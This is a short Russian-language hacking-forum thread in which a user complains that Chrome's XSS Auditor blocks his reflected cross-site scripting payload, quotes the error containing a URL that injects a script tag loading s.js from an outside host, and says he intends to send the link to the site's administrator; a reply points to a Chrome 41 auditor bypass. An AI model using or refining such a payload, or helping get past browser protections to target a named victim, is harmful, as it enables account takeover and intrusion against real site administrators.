PDA

Просмотр полной версии : Хром блокирует XSS


ShpillyWilly
02.12.2015, 12:36
Хром блокирует исполнение XSS, в Firefox все ок, как можно это побороть, подскажите.

The XSS Auditor refused to execute a script in 'http://*****/lib/index.php/"> (http://*****/lib/index.php/%22%3E%3Cscript%20src=http://******/s.js%3E%3C/script%3E)' because its source code was found within the request. The auditor was enabled as the server sent neither an 'X-XSS-Protection' nor 'Content-Security-Policy' header.

мне же админу эту ссылку засылать, а если у него вдруг хром?!)

faza02
02.12.2015, 12:45
ну, такие дела. для 41 версии есть байпасс, искать в гугле

/threads/426123/ (https://antichat.live/threads/426123/)